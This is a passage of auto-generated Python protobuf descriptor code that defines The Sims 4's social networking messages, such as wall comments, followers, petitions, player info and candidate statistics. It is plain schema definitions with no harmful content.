full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='gallery_id',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.gallery_id',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='uuid',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.uuid',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2477,
serialized_end=2562)
_SOCIALREQUESTFEEDWALLMESSAGE = descriptor.Descriptor(name='SocialRequestFeedWallMessage',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='ending_uuid',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.ending_uuid',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='messages',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.messages',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='unserialized_messages',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.unserialized_messages',
index=2,
number=3,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='num_items',
full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.num_items',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2565,
serialized_end=2778)
_SOCIALREQUESTFOLLOWERSMESSAGE = descriptor.Descriptor(name='SocialRequestFollowersMessage',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='playerid',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.playerid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='id',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.id',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='prev_last_persona',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.prev_last_persona',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='num_request',
full_name='EA.Sims4.Network.SocialRequestFollowersMessage.num_request',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2780,
serialized_end=2889)
_SOCIALREQUESTIGNORELISTMESSAGE = descriptor.Descriptor(name='SocialRequestIgnoreListMessage',
full_name='EA.Sims4.Network.SocialRequestIgnoreListMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='player_nucleus_id',
full_name='EA.Sims4.Network.SocialRequestIgnoreListMessage.player_nucleus_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2891,
serialized_end=2950)
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO = descriptor.Descriptor(name='PlayerInfo',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleus_id',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.nucleus_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='origin_persona',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.origin_persona',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='first_party_persona',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.first_party_persona',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3101,
serialized_end=3186)
_SOCIALGETPLAYERINFOLISTMESSAGE = descriptor.Descriptor(name='SocialGetPlayerInfoListMessage',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='player_nucleus_id',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.player_nucleus_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='player_info_list',
full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.player_info_list',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2953,
serialized_end=3186)
_SOCIALCOMMENTPETITIONMESSAGE = descriptor.Descriptor(name='SocialCommentPetitionMessage',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='commentid',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage.commentid',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='commentKey',
full_name='EA.Sims4.Network.SocialCommentPetitionMessage.commentKey',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3188,
serialized_end=3276)
_SOCIALBIOPETITIONMESSAGE = descriptor.Descriptor(name='SocialBioPetitionMessage',
full_name='EA.Sims4.Network.SocialBioPetitionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialBioPetitionMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='bio_nucleusid',
full_name='EA.Sims4.Network.SocialBioPetitionMessage.bio_nucleusid',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3278,
serialized_end=3346)
_SOCIALFEEDREMOVALMESSAGE = descriptor.Descriptor(name='SocialFeedRemovalMessage',
full_name='EA.Sims4.Network.SocialFeedRemovalMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='feed_id',
full_name='EA.Sims4.Network.SocialFeedRemovalMessage.feed_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3348,
serialized_end=3391)
_SOCIALCONTROLMESSAGE = descriptor.Descriptor(name='SocialControlMessage',
full_name='EA.Sims4.Network.SocialControlMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='opcode',
full_name='EA.Sims4.Network.SocialControlMessage.opcode',
index=0,
number=1,
type=14,
cpp_type=8,
label=2,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='subop',
full_name='EA.Sims4.Network.SocialControlMessage.subop',
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='transactionId',
full_name='EA.Sims4.Network.SocialControlMessage.transactionId',
index=2,
number=3,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='result',
full_name='EA.Sims4.Network.SocialControlMessage.result',
index=3,
number=100,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='getwallcommentsmsg',
full_name='EA.Sims4.Network.SocialControlMessage.getwallcommentsmsg',
index=4,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='postwallcommentmsg',
full_name='EA.Sims4.Network.SocialControlMessage.postwallcommentmsg',
index=5,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='deletewallcommentmsg',
full_name='EA.Sims4.Network.SocialControlMessage.deletewallcommentmsg',
index=6,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='friendmsg',
full_name='EA.Sims4.Network.SocialControlMessage.friendmsg',
index=7,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='genericresponse',
full_name='EA.Sims4.Network.SocialControlMessage.genericresponse',
index=8,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='playerinfo',
full_name='EA.Sims4.Network.SocialControlMessage.playerinfo',
index=9,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='feedsubmsg',
full_name='EA.Sims4.Network.SocialControlMessage.feedsubmsg',
index=10,
number=10,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='searchresultmsg',
full_name='EA.Sims4.Network.SocialControlMessage.searchresultmsg',
index=11,
number=11,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='inviteresponsemsg',
full_name='EA.Sims4.Network.SocialControlMessage.inviteresponsemsg',
index=12,
number=12,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='originerror',
full_name='EA.Sims4.Network.SocialControlMessage.originerror',
index=13,
number=13,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialcassandratest',
full_name='EA.Sims4.Network.SocialControlMessage.socialcassandratest',
index=14,
number=14,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialfriendlistrequestmsg',
full_name='EA.Sims4.Network.SocialControlMessage.socialfriendlistrequestmsg',
index=15,
number=15,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialrequestnucleusidfrompersona',
full_name='EA.Sims4.Network.SocialControlMessage.socialrequestnucleusidfrompersona',
index=16,
number=16,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialnucleusidfrompersonaresponse',
full_name='EA.Sims4.Network.SocialControlMessage.socialnucleusidfrompersonaresponse',
index=17,
number=17,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialexchangemessage',
full_name='EA.Sims4.Network.SocialControlMessage.socialexchangemessage',
index=18,
number=18,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='socialrequestfeedwallmessage',
full_name='EA.Sims4.Network.SocialControlMessage.socialrequestfeedwallmessage',
index=19,
number=19,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='stat_tickers',
full_name='EA.Sims4.Network.SocialControlMessage.stat_tickers',
index=20,
number=21,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='comment_petition_msg',
full_name='EA.Sims4.Network.SocialControlMessage.comment_petition_msg',
index=21,
number=22,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='feedremovalmsg',
full_name='EA.Sims4.Network.SocialControlMessage.feedremovalmsg',
index=22,
number=23,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='bio_petition_msg',
full_name='EA.Sims4.Network.SocialControlMessage.bio_petition_msg',
index=23,
number=24,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='fb_event_msg',
full_name='EA.Sims4.Network.SocialControlMessage.fb_event_msg',
index=24,
number=25,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='requestfollowers_msg',
full_name='EA.Sims4.Network.SocialControlMessage.requestfollowers_msg',
index=25,
number=26,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='responsefollowers_msg',
full_name='EA.Sims4.Network.SocialControlMessage.responsefollowers_msg',
index=26,
number=27,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='requestignorelist_msg',
full_name='EA.Sims4.Network.SocialControlMessage.requestignorelist_msg',
index=27,
number=28,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='response_player_info_list_msg',
full_name='EA.Sims4.Network.SocialControlMessage.response_player_info_list_msg',
index=28,
number=29,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='player_identification_list_msg',
full_name='EA.Sims4.Network.SocialControlMessage.player_identification_list_msg',
index=29,
number=30,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='candidate_msg',
full_name='EA.Sims4.Network.SocialControlMessage.candidate_msg',
index=30,
number=31,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='evaluation_results_msg',
full_name='EA.Sims4.Network.SocialControlMessage.evaluation_results_msg',
index=31,
number=32,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='cg_update_msg',
full_name='EA.Sims4.Network.SocialControlMessage.cg_update_msg',
index=32,
number=33,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=3394,
serialized_end=5713)
_SOCIALINVALIDATEMSG = descriptor.Descriptor(name='SocialInvalidateMsg',
full_name='EA.Sims4.Network.SocialInvalidateMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='cache_index',
full_name='EA.Sims4.Network.SocialInvalidateMsg.cache_index',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='key',
full_name='EA.Sims4.Network.SocialInvalidateMsg.key',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5715,
serialized_end=5770)
_SOCIALCONTROLQUEUEBROADCASTMESSAGE = descriptor.Descriptor(name='SocialControlQueueBroadcastMessage',
full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='control',
full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage.control',
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='friendIds',
full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage.friendIds',
index=1,
number=3,
type=4,
cpp_type=4,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), b'\x10\x01')))],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5772,
serialized_end=5888)
_LIFEEVENTMESSAGE = descriptor.Descriptor(name='LifeEventMessage',
full_name='EA.Sims4.Network.LifeEventMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='type',
full_name='EA.Sims4.Network.LifeEventMessage.type',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='sim_ids',
full_name='EA.Sims4.Network.LifeEventMessage.sim_ids',
index=1,
number=2,
type=6,
cpp_type=4,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), b'\x10\x01')))],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5890,
serialized_end=5943)
_SOCIALFACEBOOKEVENTMESSAGE = descriptor.Descriptor(name='SocialFacebookEventMessage',
full_name='EA.Sims4.Network.SocialFacebookEventMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='objectId',
full_name='EA.Sims4.Network.SocialFacebookEventMessage.objectId',
index=0,
number=1,
type=9,
cpp_type=9,
label=2,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='accessToken',
full_name='EA.Sims4.Network.SocialFacebookEventMessage.accessToken',
index=1,
number=2,
type=9,
cpp_type=9,
label=2,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='guid',
full_name='EA.Sims4.Network.SocialFacebookEventMessage.guid',
index=2,
number=3,
type=9,
cpp_type=9,
label=2,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=5945,
serialized_end=6026)
_SOCIALCANDIDATESTATISTICSUBMESSAGE = descriptor.Descriptor(name='SocialCandidateStatisticSubmessage',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='remote_id',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.remote_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='views_count',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.views_count',
index=1,
number=2,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='wins_count',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.wins_count',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='platform',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.platform',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='category',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.category',
index=4,
number=5,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='was_reported',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.was_reported',
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), b'\x18\x01'))),
descriptor.FieldDescriptor(name='expires_epoch_sec',
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.expires_epoch_sec',
index=6,
number=7,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6029,
serialized_end=6214)
_SOCIALCANDIDATESMESSAGE = descriptor.Descriptor(name='SocialCandidatesMessage',
full_name='EA.Sims4.Network.SocialCandidatesMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='count',
full_name='EA.Sims4.Network.SocialCandidatesMessage.count',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='platform_restriction',
full_name='EA.Sims4.Network.SocialCandidatesMessage.platform_restriction',
index=1,
number=2,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='category_restriction',
full_name='EA.Sims4.Network.SocialCandidatesMessage.category_restriction',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='challenge',
full_name='EA.Sims4.Network.SocialCandidatesMessage.challenge',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='digest',
full_name='EA.Sims4.Network.SocialCandidatesMessage.digest',
index=4,
number=5,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='candidates',
full_name='EA.Sims4.Network.SocialCandidatesMessage.candidates',
index=5,
number=6,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='expire_epoch_secs',
full_name='EA.Sims4.Network.SocialCandidatesMessage.expire_epoch_secs',
index=6,
number=7,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6217,
serialized_end=6453)
_SOCIALEVALUATIONRESULTSMESSAGE = descriptor.Descriptor(name='SocialEvaluationResultsMessage',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='winner_ids',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.winner_ids',
index=0,
number=1,
type=9,
cpp_type=9,
label=3,
